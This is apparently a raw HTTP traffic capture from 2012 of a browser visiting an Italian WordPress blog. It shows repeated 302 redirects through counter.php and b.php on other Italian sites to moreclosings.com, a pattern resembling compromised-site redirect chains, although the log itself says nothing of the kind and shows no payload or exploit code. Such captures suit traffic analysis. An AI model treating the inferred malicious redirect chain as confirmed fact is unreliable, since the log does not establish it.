Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
If-Modified-Since: Fri, 20 Apr 2012 07:29:27 GMT
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /statuses/user_timeline/.json?callback=twitterCallback2&count=1 HTTP/1.1

Host: twitter.com
GET /statuses/user_timeline/.json?callback=twitterCallback2&amp;count=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 404 Not Found

Content-Type: application/json; charset=utf-8
Date: Fri, 26 Oct 2012 01:52:25 GMT
Status: 404 Not Found
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Pragma: no-cache
Last-Modified: Fri, 26 Oct 2012 01:52:25 GMT
X-Frame-Options: SAMEORIGIN
X-MID: 6717b396d3a437f77008634b61f7e151dbfc9e74
X-Transaction: 9f5a97375de131c2
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Set-Cookie: k=10.35.101.127.1351216345055945; path=/; expires=Fri, 02-Nov-12 01:52:25 GMT; domain=.twitter.com guest_id=v1%3A135121634506680467; domain=.twitter.com; path=/; expires=Sun, 26-Oct-2014 13:52:25 GMT original_referer=ZLhHHTiegr%2B6gYSUfDaPHPk7hu7R4q2yvEmWlcld9B8%3D; path=/ external_referer=ZLhHHTiegr%2B6gYSUfDaPHPk7hu7R4q2yvEmWlcld9B8%3D%7C0; path=/; expires=Sat, 27-Oct-2012 01:52:25 GMT _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOwvxZo6ASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWE3%250AZTlkZjEyNmMxNDBhNGYyZTU3Yjc2MzUzOTg2YWVl--b7a8dbf96538e19f0442b8d038765897a77e403a; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Server: tfe
Content-Encoding: gzip
Content-Length: 110
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
If-Modified-Since: Fri, 20 Apr 2012 07:29:27 GMT
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/prettyPhoto/light_rounded/loader.gif HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/css/prettyPhoto.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:31 GMT
Etag: &quot;40e55b9-9f1-4bea527a74ec0&quot;
Accept-Ranges: bytes
Content-Length: 2545
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/prettyPhoto/light_rounded/sprite.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/css/prettyPhoto.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:31 GMT
Etag: &quot;40e5887-fa8-4bea527a74ec0&quot;
Accept-Ranges: bytes
Content-Length: 4008
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
If-Modified-Since: Fri, 20 Apr 2012 07:29:27 GMT
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
GET /images/hg728x90.swf?clickTAG=http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=page404 HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://moreclosings.com/showthread.php?sid=174143
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: &quot;e3899ca-a95c-48b354f7d9380&quot;
Accept-Ranges: bytes
Content-Length: 43356
Connection: close
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT
Etag: &quot;289dff-26c-4cb2ceb2654c0&quot;
Accept-Ranges: bytes
Content-Length: 620
Date: Fri, 26 Oct 2012 01:52:25 GMT
Connection: keep-alive
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
If-Modified-Since: Fri, 20 Apr 2012 07:29:27 GMT
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
If-Modified-Since: Fri, 20 Apr 2012 07:29:27 GMT
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
GET /images/hg728x90.swf?clickTAG=http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=page404 HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://moreclosings.com/showthread.php?sid=174143
If-Modified-Since: Mon, 12 Jul 2010 18:56:30 GMT
If-None-Match: &quot;e3899ca-a95c-48b354f7d9380&quot;
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Date: Fri, 26 Oct 2012 01:52:26 GMT
Server: Apache/2.2.15 (CentOS)
Connection: close
Etag: &quot;e3899ca-a95c-48b354f7d9380&quot;
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
If-Modified-Since: Fri, 20 Apr 2012 07:29:27 GMT
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
If-Modified-Since: Fri, 20 Apr 2012 07:29:27 GMT
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:26 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache/2.2
Content-Length: 209
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /images/hg728x90.swf?clickTAG=http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=page404 HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://moreclosings.com/showthread.php?sid=174143
If-Modified-Since: Mon, 12 Jul 2010 18:56:30 GMT
If-None-Match: &quot;e3899ca-a95c-48b354f7d9380&quot;
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Date: Fri, 26 Oct 2012 01:52:26 GMT
Server: Apache/2.2.15 (CentOS)
Connection: close
Etag: &quot;e3899ca-a95c-48b354f7d9380&quot;
GET /elezioni_2001/b.php HTTP/1.1

Host: www.castelmorrone.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache/2.2
X-Powered-By: PHP/4.4.9
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:25 GMT
Server: Apache/2.2
Content-Length: 209
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:26 GMT
Server: Apache/2.2
Content-Length: 209
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive